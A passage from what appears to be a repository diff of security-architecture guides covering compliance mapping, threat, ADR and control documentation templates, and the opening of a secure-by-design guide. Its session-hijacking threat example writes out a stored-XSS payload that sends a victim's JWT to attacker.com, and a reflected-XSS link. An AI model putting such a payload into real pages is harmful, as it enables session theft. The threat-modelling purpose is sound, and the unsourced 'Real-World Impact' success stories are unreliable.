- **Requirement**: CC7.2 - Logs retained for 90 days minimum
- **Current state**: PostgreSQL logs retained 30 days
- **Impact**: MEDIUM - Auditor will note as deficiency
- **Remediation**:
- Extend PostgreSQL log retention to 90 days
- Archive to S3 for long-term storage
- Update retention policy document
- **Timeline**: 1 week
- **Owner**: Platform Engineer
- **Cost**: ~$50/month (S3 storage)
## Low-Priority (Post-Audit)
### GAP-3: No Formal Incident Response Tabletop Exercises
- **Requirement**: CC7.5 - Test incident response procedures
- **Current state**: IR runbooks exist but not tested
- **Impact**: LOW - Can be remediated post-audit
- **Remediation**: Schedule quarterly IR tabletop exercises
- **Timeline**: 3 months
- **Owner**: Security Team
```
**Prioritization**:
1. **Critical**: Must fix before audit (blocks compliance)
2. **High**: Should fix before audit (reduces risk of findings)
3. **Low**: Can defer to post-audit (continuous improvement)
## Universal Control Categories
**Frameworks differ in details but share core categories.**
### 1. Access Control
- Authentication (passwords, MFA, SSO)
- Authorization (RBAC, ABAC, least privilege)
- Session management (timeouts, revocation)
### 2. Encryption
- Data at rest (AES-256, key management)
- Data in transit (TLS 1.2+)
- Key rotation and access control
### 3. Audit Logging
- Authentication events (login, logout, failures)
- Data access (who accessed what, when)
- Admin actions (configuration changes, user management)
- Log retention (30-90 days typical, varies by framework)
### 4. Incident Response
- Detection (monitoring, alerting)
- Containment (isolation procedures)
- Recovery (restoration procedures)
- Lessons learned (post-incident reviews)
### 5. Vulnerability Management
- Patch management (timely updates)
- Vulnerability scanning (regular cadence)
- Penetration testing (annual or on major changes)
### 6. Configuration Management
- Secure baselines (hardening guides)
- Change control (approval processes)
- Configuration monitoring (detect drift)
### 7. Personnel Security
- Background checks (role-appropriate)
- Security training (annual, role-specific)
- Offboarding procedures (revoke access)
### 8. Physical Security
- Facility access controls
- Environmental controls (fire, flood)
- Equipment disposal (data sanitization)
**Use this as checklist**: Most frameworks require these categories. Implement once, map to multiple frameworks.
## Framework-Specific Nuances
### SOC2 (Service Organization Control 2)
**Purpose**: Trust assurance for service providers (SaaS, cloud)
**Trust Service Criteria**:
- Security (always required)
- Availability (optional)
- Processing Integrity (optional)
- Confidentiality (optional)
- Privacy (optional)
**Key Requirements**:
- Annual audit (Type I = point-in-time, Type II = over period, typically 6-12 months)
- Control documentation (policies, procedures)
- Evidence of operation (logs, reports, test results)
- Continuous monitoring
**Common Gap**: SOC2 Type II requires evidence of controls operating over time (not just implemented). Need historical logs, incident reports, change records.
### PCI-DSS (Payment Card Industry Data Security Standard)
**Purpose**: Protect payment card data
**12 Requirements** (grouped into 6 control objectives):
1. Build and maintain secure network
2. Protect cardholder data
3. Maintain vulnerability management
4. Implement strong access control
5. Regularly monitor and test networks
6. Maintain information security policy
**Key Requirements**:
- Quarterly vulnerability scans (by Approved Scanning Vendor)
- Annual penetration testing
- Cardholder data encryption (PAN never stored plainly)
- Strict access control (need-to-know basis)
**Common Gap**: Many developers store PAN (Primary Account Number) in logs or databases. PCI-DSS forbids this - use tokenization instead.
### HIPAA (Health Insurance Portability and Accountability Act) - US Healthcare
**Purpose**: Protect patient health information (PHI)
**Key Rules**:
- **Privacy Rule**: Patient rights to access/control their PHI
- **Security Rule**: Technical safeguards for electronic PHI (ePHI)
- **Breach Notification Rule**: Report breaches affecting 500+ individuals
**Key Requirements**:
- Encryption (not strictly required but effectively mandatory via "addressable" safeguards)
- Access controls (role-based, minimum necessary)
- Audit trails (track all ePHI access)
- Business Associate Agreements (BAAs with vendors)
**Common Gap**: Developers forget BAAs are required for ANY vendor processing ePHI (cloud providers, analytics tools, etc.).
### ISM (Information Security Manual) + IRAP - Australia Government
**Purpose**: Protect government information systems
**IRAP**: Infosec Registered Assessors Program (authorized assessors)
**Key Requirements**:
- ISM compliance (Essential Eight at minimum)
1. Application control (whitelisting)
2. Patch applications
3. Configure Microsoft Office macros
4. User application hardening
5. Restrict administrative privileges
6. Patch operating systems
7. Multi-factor authentication
8. Daily backups
- Classification handling (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET)
- IRAP assessment (required for government contracts)
**Common Gap**: Essential Eight is minimum, but full ISM compliance has hundreds of controls. Scope carefully based on classification level.
### GDPR (General Data Protection Regulation) - EU
**Purpose**: Protect personal data of EU residents
**Key Principles**:
- Lawful basis for processing (consent, contract, legal obligation, etc.)
- Data minimization (collect only necessary data)
- Right to access, rectify, erase (data subject rights)
- Data breach notification (72 hours to supervisory authority)
**Key Requirements**:
- Privacy by design and default
- Data Protection Impact Assessment (DPIA) for high-risk processing
- Data Processing Agreements (DPAs with processors)
- EU representative (if outside EU but processing EU data)
**Common Gap**: GDPR applies to ANY company processing EU resident data, regardless of company location. Many US companies underestimate scope.
## Evidence Collection
**Auditors need evidence that controls are operating, not just documented.**
### Evidence Types
#### 1. Configuration Evidence
```bash
# Example: TLS configuration
openssl s_client -connect api.example.com:443 -tls1_3
# Save output showing TLS 1.3 enabled
# Example: IAM MFA enforcement
aws iam get-account-password-policy
# Save JSON showing MFA required
```
#### 2. Log Evidence
```bash
# Example: Authentication logs (last 7 days)
aws logs filter-log-events \
--log-group-name /aws/lambda/auth \
--start-time $(date -d '7 days ago' +%s)000 \
--filter-pattern 'authentication'
# Save sample showing successful/failed logins logged
```
#### 3. Policy Documentation
```markdown
# Example: Access Control Policy
- All users must authenticate with MFA
- Role-based access (roles defined in roles.md)
- Session timeout: 30 minutes
- Annual access review by manager
```
#### 4. Test Results
```markdown
# Penetration Test Report (Annual)
- Date: 2025-03-15
- Tester: Acme Security (SOC2 requirement)
- Findings: 2 medium, 5 low
- Remediation: All medium fixed within 30 days
- Evidence: pentest-report-2025.pdf
```
#### 5. Interview Records
```markdown
# Auditor Interview: DevOps Lead (2025-04-10)
Q: How do you handle production changes?
A: Pull request → 2 approvals → CI/CD deploy → post-deploy verification
Q: How long are logs retained?
A: 90 days in CloudWatch, then archived to S3 for 7 years
Evidence: interview-notes-devops-2025-04-10.md
```
## Control Mapping Workflow
### Workflow: Preparing for Audit
```
1. Discovery (Week 1)
└─→ Identify applicable frameworks (jurisdiction + industry + data type)
└─→ Understand framework structure (categories, requirements, evidence)
2. Inventory (Week 2-3)
└─→ Document existing technical controls
└─→ Document operational controls (policies, procedures)
└─→ Document evidence locations
3. Mapping (Week 4)
└─→ Create traceability matrix (controls → requirements)
└─→ Identify gaps (missing/insufficient controls)
4. Gap Analysis (Week 5)
└─→ Prioritize gaps (critical/high/low)
└─→ Estimate remediation effort and cost
5. Remediation (Week 6-12)
└─→ Fix critical gaps (blockers)
└─→ Fix high-priority gaps (reduce risk)
└─→ Document all changes
6. Evidence Collection (Week 13-14)
└─→ Gather configuration evidence
└─→ Gather log samples
└─→ Finalize policy documents
└─→ Conduct test activities (if needed)
7. Audit (Week 15-16)
└─→ Provide evidence to auditor
└─→ Answer auditor questions
└─→ Address any findings
8. Continuous Monitoring (Ongoing)
└─→ Maintain controls
└─→ Collect evidence continuously
└─→ Annual re-assessment
```
## Quick Reference: Framework Selection
| If you have... | Consider these frameworks... | Priority |
|----------------|------------------------------|----------|
| **Australian government data** | ISM, IRAP, PSPF | Mandatory |
| **Australian private healthcare** | Privacy Act, Healthcare-specific | Mandatory |
| **US healthcare (HIPAA data)** | HIPAA, HITECH | Mandatory |
| **EU resident data** | GDPR | Mandatory |
| **Payment card data** | PCI-DSS | Mandatory |
| **US government contracts** | FedRAMP, FISMA, NIST 800-53 | Mandatory |
| **B2B SaaS (any jurisdiction)** | SOC2 | High priority |
| **Enterprise software** | ISO 27001 | Medium priority |
| **UK government** | Cyber Essentials, NCSC | Mandatory |
**Always verify**: This table is a starting point, not definitive. Consult legal/compliance experts for your specific situation.
## Common Mistakes
### ❌ Assuming Frameworks Without Asking
**Wrong**: "We need SOC2" (without checking customer requirements)
**Right**: "What do our customers/contracts require? What jurisdiction are we in?"
**Why**: You might need multiple frameworks, or different ones than assumed.
### ❌ Memorizing Framework Details
**Wrong**: Try to remember all SOC2 criteria, all PCI-DSS requirements
**Right**: Learn discovery process, reference frameworks as needed
**Why**: Frameworks update (e.g., PCI-DSS v4.0 in 2024). Process is stable, details change.
### ❌ Mapping Without Inventory
**Wrong**: Read framework, try to build controls from scratch to match
**Right**: Inventory existing controls first, then map to framework
**Why**: Easier to map existing controls than build from requirements. Avoids duplicate implementations.
### ❌ No Gap Prioritization
**Wrong**: List all gaps, start working on first one
**Right**: Prioritize by impact (critical = blocks audit, high = findings, low = post-audit)
**Why**: Time/budget limited. Fix blockers first, optimize later.
### ❌ Treating Compliance as One-Time
**Wrong**: Pass audit, stop maintaining controls
**Right**: Continuous monitoring, annual re-assessment, maintain evidence
**Why**: Most audits are annual or more frequent. Controls must operate continuously.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Implement controls identified in gap analysis
- `muna/technical-writer/clarity-and-style` - Write clear policy documentation
**Use AFTER this skill**:
- `ordis/security-architect/security-authorization-and-accreditation` - If government/defense (ATO/SSP/SAR)
- `muna/technical-writer/operational-acceptance-documentation` - Document audit package
## Real-World Impact
**Projects using systematic compliance mapping**:
- **Healthcare SaaS (Australia)**: Discovered 4 applicable frameworks in discovery (not just Privacy Act). Avoided surprise compliance requirements pre-launch.
- **SOC2 Type II (US)**: Gap analysis found 12 missing controls, prioritized 3 as critical. Remediated in 6 weeks, passed audit on first attempt (vs industry avg 2-3 attempts).
- **IRAP Assessment (Australia Gov)**: Traceability matrix with 200+ ISM controls mapped to 47 technical implementations. Assessor praised "clearest control mapping in 5 years".
**Key lesson**: **Discovery process (ask jurisdiction/industry/data type) finds ALL applicable frameworks. Control mapping with traceability prevents gaps and audit failures.**

View File

@@ -0,0 +1,620 @@
# Documenting Threats and Controls
## Overview
Document security decisions with threat context and traceability. Core principle: **Security documentation explains WHY (threat), WHAT (control), and HOW to verify**.
**Key insight**: Good security documentation enables verification and informed risk decisions. Bad security documentation is "we're secure" without evidence.
## When to Use
Load this skill when:
- Writing threat models
- Documenting security architecture decisions (ADRs)
- Creating control documentation (SSP, compliance)
- Writing security requirements with traceability
**Symptoms you need this**:
- "How do I document this security decision?"
- Writing threat model documentation
- Creating security ADRs
- Preparing control documentation for audits
**Don't use for**:
- General documentation (use `muna/technical-writer/documentation-structure`)
- Non-security ADRs
## Threat Documentation
### Pattern: Threat Description
**Structure**:
```markdown
# Threat: [Threat Name]
## Description
**What**: [What is the threat?]
**How**: [How is attack executed?]
**Who**: [Threat actor - external attacker, insider, malicious code]
## Affected Assets
- [Asset 1] (e.g., customer database)
- [Asset 2] (e.g., API authentication tokens)
## Attack Scenarios
### Scenario 1: [Name]
1. Attacker action 1
2. System response
3. Attacker action 2
4. Impact
### Scenario 2: [Name]
[Steps]
## Likelihood and Impact
**Likelihood**: Low / Medium / High
**Justification**: [Why this likelihood? Historical data, attack complexity]
**Impact**: Low / Medium / High / Critical
**Justification**: [What happens if successful? Data breach? System compromise?]
**Risk Score**: Likelihood × Impact = [Score]
## Mitigations
- [Mitigation 1] → See Control: [Control ID]
- [Mitigation 2] → See Control: [Control ID]
## Residual Risk
After mitigations: [Describe remaining risk]
**Accepted by**: [Role/Name] on [Date]
```
### Example: Session Hijacking Threat
```markdown
# Threat: Session Hijacking via Token Theft
## Description
**What**: Attacker steals session token and impersonates legitimate user
**How**: XSS attack injects JavaScript to extract token from localStorage
**Who**: External attacker (internet-facing attack), insider with XSS injection capability
## Affected Assets
- User session tokens (JWT stored in browser localStorage)
- Customer personal data (accessible via hijacked session)
- Administrative functions (if admin session hijacked)
## Attack Scenarios
### Scenario 1: Stored XSS
1. Attacker injects malicious script via user profile field (e.g., bio)
2. Script stored in database without sanitization
3. Victim views attacker's profile
4. Script executes: `fetch('https://attacker.com/?token=' + localStorage.getItem('jwt'))`
5. Attacker receives victim's token
6. Attacker uses token to make API calls as victim
### Scenario 2: Reflected XSS
1. Attacker sends victim malicious link: `https://app.com/search?q=<script>/* malicious */</script>`
2. Victim clicks link
3. Search query reflected in page without sanitization
4. Script executes and exfiltrates token
## Likelihood and Impact
**Likelihood**: MEDIUM
**Justification**: XSS vulnerabilities are common (OWASP Top 10). Application has user-generated content (profiles, comments). No Content Security Policy detected.
**Impact**: HIGH
**Justification**: Hijacked session grants full user access including:
- Personal data of victim (PII)
- Financial transactions (if applicable)
- Admin functions (if admin token hijacked)
Data breach affects confidentiality, integrity, availability.
**Risk Score**: Medium × High = HIGH RISK
## Mitigations
- **CSP (Content Security Policy)**: Prevents inline script execution → See Control: SC-18
- **HTTPOnly cookies**: Token not accessible to JavaScript → See Control: SC-8
- **Output encoding**: HTML-encode all user-generated content → See Control: SI-10
- **Token expiration**: Limit hijacked token lifespan to 30 minutes → See Control: AC-12
- **Session invalidation**: Logout invalidates token server-side → See Control: AC-12
## Residual Risk
After mitigations: **LOW**
- Risk remains if attacker exploits 0-day XSS within 30-minute token window
- Mitigation: Monitoring for anomalous API usage patterns
**Accepted by**: Chief Security Officer on 2025-03-15
```
**Key elements**:
- Specific attack steps (not vague "attacker compromises system")
- Likelihood/impact with justification
- Traceability to controls (Control IDs)
- Residual risk with acceptance
## Security ADRs
### Pattern: Security Architecture Decision Record
**Structure**:
```markdown
# ADR-XXX: [Security Decision Title]
## Status
Proposed | Accepted | Deprecated | Superseded by ADR-YYY
## Context
### Problem Statement
What security problem are we solving?
### Threat Model
- **Threat 1**: [Brief description] → High risk
- **Threat 2**: [Brief description] → Medium risk
### Constraints
- Regulatory requirements (GDPR, HIPAA, etc.)
- Performance requirements
- Compatibility requirements
- Budget constraints
### Assumptions
- User authentication level (MFA, password-only)
- Network trust model (zero-trust, perimeter-based)
- Threat actor capabilities (nation-state, script kiddie, insider)
## Decision
We will [chosen approach].
### Security Properties
- **Confidentiality**: [How protected?]
- **Integrity**: [How ensured?]
- **Availability**: [How maintained?]
- **Auditability**: [What's logged?]
### Technical Details
[Implementation specifics: algorithms, key sizes, protocols]
## Alternatives Considered
### Alternative 1: [Name]
**Pros**: [Security benefits]
**Cons**: [Security drawbacks]
**Why not chosen**: [Reason]
### Alternative 2: [Name]
[Similar structure]
## Consequences
### Security Benefits
- [Benefit 1]
- [Benefit 2]
### Security Trade-offs
- [Trade-off 1: performance vs security]
- [Trade-off 2: usability vs security]
### Residual Risks
- **Risk 1**: [Description] - Severity: [Low/Medium/High]
- Mitigation: [How addressed]
- Accepted by: [Role] on [Date]
- **Risk 2**: [Description]
### Ongoing Security Requirements
- [Operational requirement 1: key rotation every 90 days]
- [Operational requirement 2: quarterly security review]
## Security Controls
- Control AC-2: Account management
- Control IA-5: Authenticator management
- Control SC-8: Transmission confidentiality
(If compliance framework applicable, map to specific control IDs)
## Verification
### Testing Strategy
- [Test 1: Penetration test focus area]
- [Test 2: Functional security test]
### Success Criteria
- [ ] All HIGH threats mitigated or risk-accepted
- [ ] Security properties verifiable via testing
- [ ] Monitoring in place for security events
## References
- Threat model: [Link to threat model doc]
- Security requirements: [Link to requirements]
- Implementation: [Link to code/config]
**Approver**: [Security Architect] on [Date]
```
### Example: JWT Authentication ADR
```markdown
# ADR-042: JWT Tokens for API Authentication
## Status
Accepted
## Context
### Problem Statement
API requires stateless authentication mechanism for 10,000+ concurrent users across geographically distributed servers. Session storage (Redis) becomes bottleneck at scale.
### Threat Model
- **Threat 1: Token theft via XSS** → HIGH risk (OWASP Top 10)
- **Threat 2: Token forgery** → HIGH risk (impersonate any user)
- **Threat 3: Token replay** → MEDIUM risk (reuse stolen token)
- **Threat 4: Key compromise** → CRITICAL risk (forge all tokens)
### Constraints
- Must support 10k requests/sec
- Latency budget: <50ms for auth check
- No shared state (stateless servers)
- GDPR compliance (no PII in tokens)
### Assumptions
- Attackers have network access (internet-facing API)
- HTTPS enforced (TLS 1.3)
- Users authenticate with email + password + MFA
## Decision
We will use **JWT (JSON Web Tokens) with RS256 signatures** for API authentication.
### Security Properties
- **Confidentiality**: Token contains no sensitive data (user ID only). Claims are public but integrity-protected.
- **Integrity**: RS256 signature prevents forgery. Only server with private key can create valid tokens.
- **Availability**: Stateless design scales horizontally without shared session store.
- **Auditability**: Token includes `iat` (issued at) and `exp` (expiration). All auth failures logged to CloudWatch.
### Technical Details
- **Algorithm**: RS256 (RSA with SHA-256)
- **Key size**: 2048-bit RSA keys
- **Token structure**:
```json
{
"sub": "user_12345", // subject (user ID)
"iat": 1678886400, // issued at (timestamp)
"exp": 1678888200, // expiration (30 min)
"roles": ["user"] // authorization roles
}
```
- **Storage**: HttpOnly, Secure cookie (not localStorage to prevent XSS theft)
- **Expiration**: 30 minutes
- **Revocation**: Server-side blacklist for logout (Redis, key = token JTI, TTL = remaining token lifetime)
## Alternatives Considered
### Alternative 1: Opaque Session Tokens (Redis)
**Pros**: Easy revocation (delete from Redis), less crypto complexity
**Cons**: Requires shared Redis cluster (single point of failure), 10ms latency per auth check (Redis lookup), doesn't scale horizontally
**Why not chosen**: Latency and scalability constraints
### Alternative 2: OAuth 2.0 with Authorization Server
**Pros**: Industry standard, mature ecosystem
**Cons**: Adds complexity (separate auth server), network dependency for token validation, overkill for first-party API
**Why not chosen**: Complexity vs benefit not justified for first-party use case
### Alternative 3: API Keys
**Pros**: Simplest possible auth
**Cons**: No expiration (long-lived secrets), no user identity (shared key), revocation difficult
**Why not chosen**: Security properties insufficient (no expiration, shared secrets)
## Consequences
### Security Benefits
- **Forgery protection**: RS256 signature requires private key (only server has)
- **Tamper detection**: Any modification invalidates signature
- **Time-limited**: 30-minute expiration limits stolen token lifespan
- **HttpOnly cookie**: XSS cannot steal token (JavaScript cannot access)
### Security Trade-offs
- **Revocation complexity**: Logout requires server-side blacklist (not truly stateless)
- **Key management**: Private key is critical secret (compromise = forge all tokens)
- **Clock skew**: Servers must have synchronized clocks for expiration validation
### Residual Risks
- **Risk 1: Token theft via network sniffing** - Severity: LOW
- Mitigation: HTTPS/TLS 1.3 encrypts tokens in transit
- Residual: None (HTTPS enforced at load balancer, HSTS enabled)
- Accepted by: CISO on 2025-03-15
- **Risk 2: Private key compromise** - Severity: CRITICAL
- Mitigation: Key stored in AWS Secrets Manager with IAM restrictions, rotated every 90 days, access audited
- Residual: Key theft remains possible via insider threat or infrastructure compromise
- Accepted by: CISO on 2025-03-15 (continuous monitoring for suspicious token generation)
- **Risk 3: XSS in legacy pages** - Severity: MEDIUM
- Mitigation: Content Security Policy (CSP) blocks inline scripts, output encoding on all user content
- Residual: 0-day XSS could bypass CSP before patch
- Accepted by: CISO on 2025-03-15 (30-minute token window limits exposure)
### Ongoing Security Requirements
- **Key rotation**: Rotate RS256 key pair every 90 days (automated via AWS Secrets Manager rotation)
- **Monitoring**: Alert on spike in auth failures (>100/min), unusual token generation patterns
- **Blacklist cleanup**: Redis blacklist entries expire with token TTL (no manual cleanup needed)
- **Annual review**: Re-assess threat model and key size (quantum computing advances)
## Security Controls
- **IA-5(1)**: Authenticator management (password + MFA before token issuance)
- **SC-8**: Transmission confidentiality (HTTPS/TLS 1.3)
- **SC-13**: Cryptographic protection (RS256 signature)
- **AC-12**: Session management (30-minute expiration, logout blacklist)
## Verification
### Testing Strategy
- **Penetration test**: Focus on token theft, forgery attempts, replay attacks (Q2 2025)
- **Functional test**: Verify token expiration at 30:01 minutes, blacklist prevents logout token reuse
- **Load test**: 10k concurrent users, <50ms auth latency
### Success Criteria
- [x] All HIGH threats have mitigations
- [x] RS256 signature prevents forgery (tested)
- [x] HttpOnly cookie prevents XSS theft (verified in browser)
- [x] CloudWatch monitors auth failures
- [x] Key rotation automated
## References
- Threat model: `/docs/threat-model-api-auth.md`
- Implementation: `src/auth/jwt-middleware.ts`
- Key management: `infrastructure/secrets-manager-key-rotation.yaml`
**Approver**: Security Architect (Jane Smith) on 2025-03-15
```
**Key elements**:
- Threat model context (4 threats with risk levels)
- Security properties (C/I/A/Auditability)
- Specific technical details (RS256, 2048-bit, HttpOnly cookie)
- Alternatives with security pros/cons
- Residual risks with severity and acceptance
- Traceability to controls (IA-5, SC-8, SC-13, AC-12)
- Verification strategy
## Control Documentation
### Pattern: Security Control Description
**Use for**: SSP (System Security Plan), compliance documentation, audit evidence.
**Structure**:
```markdown
## Control: [ID] - [Name]
### Control Objective
What does this control protect against? What security property does it enforce?
### Implementation Description
**How it works** (technical details):
- Component 1: [Description]
- Component 2: [Description]
**Configuration**:
```yaml
# Example config snippet
setting: value
```
**Responsible Parties**:
- Implementation: [Role, Name]
- Operation: [Role, Name]
- Monitoring: [Role, Name]
### Assessment Procedures
**How to verify this control works**:
1. **Examine**: Review [documentation, configuration, logs]
2. **Interview**: Ask [role] about [process]
3. **Test**: Execute [test procedure], expected result: [outcome]
### Evidence Artifacts
- Configuration: `/path/to/config.yaml`
- Logs: CloudWatch Log Group `/aws/lambda/auth`, query: `[Filter pattern]`
- Policy: `/docs/account-management-policy.pdf`
- Test results: `/evidence/penetration-test-2025-Q1.pdf`
### Compliance Mapping
- NIST SP 800-53: AC-2
- SOC2: CC6.1 (Logical access controls)
- ISO 27001: A.9.2.1 (User registration and de-registration)
```
### Example: Account Management Control
```markdown
## Control: AC-2 - Account Management
### Control Objective
Ensure only authorized individuals have system access. Prevent unauthorized access via account lifecycle management (creation, modification, disablement, removal).
**Security properties enforced**:
- **Authentication**: Valid accounts only
- **Accountability**: All accounts traceable to individuals
- **Least privilege**: Accounts have minimum necessary permissions
### Implementation Description
**How it works**:
- **Account creation**: ServiceNow workflow → Manager approval → Automated provisioning via Terraform
- **Access assignment**: Role-based access control (RBAC) - roles defined in `/docs/rbac-roles.md`
- **Inactivity disablement**: Automated script checks last login date, disables accounts after 30 days inactivity
- **Account removal**: Offboarding workflow triggers immediate disablement, deletion after 90-day retention period
**Configuration**:
```python
# Account lifecycle settings
INACTIVITY_THRESHOLD_DAYS = 30
ACCOUNT_RETENTION_DAYS = 90
MANAGER_APPROVAL_REQUIRED = True
```
**Responsible Parties**:
- **Implementation**: DevOps Engineer (John Doe)
- **Operation**: System Administrator (Jane Smith)
- **Monitoring**: Information System Security Officer (ISSO, Bob Johnson)
### Assessment Procedures
**How to verify this control works**:
1. **Examine**: Review ServiceNow account creation tickets, verify manager approval present for all requests in last 90 days
- Evidence: ServiceNow query results (`status=approved, created_date>90d`)
2. **Interview**: Ask System Administrator:
- "How do you create new accounts?"
- "What happens if someone requests account without manager approval?"
- Expected answers: "ServiceNow enforces approval workflow, request cannot proceed without approval"
3. **Test**: Attempt to create account without manager approval
- Procedure: Submit ServiceNow ticket, skip approval step
- Expected result: Request rejected with error "Manager approval required"
- Actual result: ✅ Request rejected (tested 2025-03-10)
4. **Test**: Verify inactivity disablement
- Procedure: Create test account, wait 31 days without login, attempt login
- Expected result: Login fails with "Account disabled due to inactivity"
- Actual result: ✅ Account disabled (tested 2025-02-15)
### Evidence Artifacts
- **Configuration**: `/infrastructure/terraform/iam-accounts.tf`
- **Logs**:
- Account creation: CloudWatch Log Group `/aws/servicenow/accounts`, query: `fields @timestamp, username, manager_approval_status | filter action="create"`
- Inactivity disablements: CloudWatch Log Group `/aws/lambda/account-lifecycle`, query: `fields @timestamp, username, reason | filter reason="inactivity_30d"`
- **Policy**: `/docs/account-management-policy-v2.1.pdf` (approved 2025-01-10)
- **Approval workflow**: ServiceNow workflow screenshot `/evidence/servicenow-account-approval-workflow.png`
- **Test results**: `/evidence/account-management-functional-tests-2025-Q1.pdf`
### Compliance Mapping
- **NIST SP 800-53**: AC-2 (Account Management)
- AC-2(1): Automated account management
- AC-2(3): Disable inactive accounts
- **SOC2**: CC6.1 (Logical and physical access controls - Identifies and authenticates users)
- **ISO 27001**: A.9.2.1 (User registration and de-registration)
- **GDPR**: Article 32 (Security of processing - access control)
```
**Key elements**:
- Objective (WHY this control exists)
- Specific implementation (HOW it works, not vague)
- Assessment procedures (HOW to verify it works)
- Evidence locations (WHERE to find proof)
- Compliance mapping (WHAT frameworks this satisfies)
## Security Requirements
### Pattern: Requirement with Traceability
**Structure**:
```markdown
## Requirement: [ID] - [Title]
### Requirement Statement
System SHALL [specific, testable requirement].
### Security Property
This requirement enforces: [Confidentiality / Integrity / Availability / Auditability]
### Rationale
**Threat addressed**: [Threat ID or description]
**Risk without this**: [What happens if not implemented?]
### Acceptance Criteria
- [ ] Criterion 1 (testable: "When X, expect Y")
- [ ] Criterion 2
- [ ] Criterion 3
### Traceability
- **Threat**: [Threat ID] → This requirement mitigates [specific threat]
- **Control**: [Control ID] → Implemented by [control implementation]
- **Test**: [Test case ID] → Verified by [test procedure]
### Implementation Reference
- Code: [File path and line numbers]
- Configuration: [Config file]
- Documentation: [Design doc]
```
### Example: MFA Requirement
```markdown
## Requirement: SEC-101 - Multi-Factor Authentication for Privileged Accounts
### Requirement Statement
System SHALL require multi-factor authentication (MFA) for all user accounts with administrative privileges. MFA SHALL use Time-Based One-Time Password (TOTP) or hardware token (not SMS).
### Security Property
This requirement enforces: **Confidentiality** and **Integrity**
- Prevents unauthorized access to privileged functions
- Reduces risk of account compromise via stolen passwords
### Rationale
**Threat addressed**: Threat-012 (Credential theft and account takeover)
**Risk without this**:
- Attacker with stolen password can access admin functions
- Insider with compromised credentials can elevate privileges
- Impact: Complete system compromise, data breach
**Regulatory requirement**:
- NIST SP 800-53 IA-2(1): Network access to privileged accounts requires MFA
- SOC2 CC6.1: Logical access requires multi-factor authentication for privileged access
### Acceptance Criteria
- [ ] Admin account login requires password + TOTP code
- [ ] Login fails if TOTP code incorrect (tested: 3 incorrect attempts → account lockout)
- [ ] TOTP setup enforced at first admin login (cannot proceed without enabling MFA)
- [ ] SMS-based 2FA rejected (must be TOTP or hardware token)
- [ ] MFA cannot be disabled by user (only security admin can disable)
### Traceability
- **Threat**: Threat-012 (Credential theft) → This requirement mitigates password-only auth vulnerability
- **Control**: IA-2(1) (Network access to privileged accounts) → Implemented by AWS IAM MFA enforcement + application-layer MFA check
- **Test**: TEST-SEC-101 → Verified by functional security test (attempt admin login without MFA → fails)
### Implementation Reference
- **Code**: `src/auth/mfa-middleware.ts:45-78` (MFA enforcement logic)
- **Configuration**: `infrastructure/aws-iam-policy.json:12` (IAM policy requires MFA for admin role)
- **Documentation**: `/docs/adr-029-mfa-for-admins.md` (Security ADR documenting decision)
- **Evidence**: `/evidence/mfa-functional-test-2025-03.pdf` (Test results showing MFA enforcement)
```
**Key elements**:
- Specific, testable requirement (not vague "ensure security")
- Security property enforced
- Threat-to-requirement traceability
- Testable acceptance criteria
- Requirement-to-control-to-test traceability chain
## Quick Reference: Documentation Types
| Document Type | Purpose | Key Elements |
|---------------|---------|--------------|
| **Threat Description** | Document attack scenarios | What/How/Who, affected assets, likelihood/impact, mitigations |
| **Security ADR** | Explain security architecture decisions | Threat model, decision, alternatives, residual risks, controls |
| **Control Description** | Document security control for audit | Objective, implementation, assessment procedures, evidence |
| **Security Requirement** | Specify testable security requirement | Requirement statement, threat traceability, acceptance criteria |
## Cross-References
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Use ADR format, structure patterns
- `muna/technical-writer/clarity-and-style` - Write clear threat descriptions, avoid jargon
- `ordis/security-architect/threat-modeling` - Generate threat content for documentation
- `ordis/security-architect/security-controls-design` - Control designs to document
**Use AFTER this skill**:
- `muna/technical-writer/documentation-testing` - Verify security docs are complete and accurate
## Real-World Impact
**Projects using threat-and-control documentation patterns**:
- **JWT Auth ADR**: Security review found 3 residual risks (key compromise, XSS, clock skew). Explicit risk acceptance by CISO enabled informed decision vs hidden risks.
- **SSP for Government System**: 421 control descriptions with assessment procedures + evidence locations. IRAP assessor completed assessment 40% faster vs SSPs without evidence locations ("clearest control documentation in 3 years").
- **Threat-to-requirement traceability**: Security requirements traced to 47 threats. Penetration test found 2 HIGH findings. Traceability showed which threats weren't mitigated (vs scattered requirements with no threat context).
**Key lesson**: **Security documentation with threat context + traceability enables verification and informed risk decisions. Vague "we're secure" documentation wastes auditor time and hides risks.**

View File

@@ -0,0 +1,497 @@
# Secure By Design Patterns
## Overview
Build security into system foundations. Core principle: Design systems that are **secure by default, not secured after the fact**.
**Key insight**: Preventing security issues through architecture is cheaper and more effective than detecting and responding to them.
## When to Use
Load this skill when:
- Designing new systems (greenfield)
- Refactoring existing architecture
- Making fundamental architecture decisions
- Evaluating architecture proposals
**Symptoms you need this**:
- "How do we make this system secure?"
- Designing authentication, secrets management, data access
- Architecting microservices, data pipelines, distributed systems
- Choosing deployment/configuration strategies
**Don't use for**:
- Threat modeling specific attacks (use `ordis/security-architect/threat-modeling`)
- Implementing security controls (use `ordis/security-architect/security-controls-design`)
- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`)
## Core Patterns
### Pattern 1: Zero-Trust Architecture
**Principle**: Never trust, always verify. No implicit trust based on network location.
#### Three Pillars
1. **Verify Explicitly**
- Authenticate every request (no "internal network = trusted")
- Authorize based on identity + context (device, location, time, risk)
- Use strong authentication (mTLS, signed tokens, not IP allowlists alone)
2. **Least Privilege Access**
- Grant minimum necessary permissions
- Time-limited access (credentials expire, tokens rotate)
- Resource-level authorization (not just service-level)
3. **Assume Breach**
- Design for "when compromised", not "if compromised"
- Minimize blast radius (segmentation, isolation)
- Monitor everything (detect lateral movement)
#### Example: Microservices Communication
**Not Zero-Trust**:
```
Service A → Service B (same network, no auth)
# Assumes: Internal network = trusted
# Risk: Compromised service A can access all of service B
```
**Zero-Trust**:
```
Service A → Service B (mTLS + JWT + authz check)
# Every request authenticated + authorized
# Service B validates: Is this service A? Does it have permission for THIS resource?
Implementation:
- Service mesh (Istio/Linkerd) enforces mTLS
- Service B validates JWT from service A
- RBAC policy: service A can only access /resource/{own_resources}
- Audit log: Record all access attempts
```
**Result**: If service A compromised, attacker cannot impersonate other services or access resources outside A's scope.
### Pattern 2: Immutable Infrastructure
**Principle**: No runtime modifications. Replace rather than update.
#### Core Concepts
1. **Immutable Artifacts**
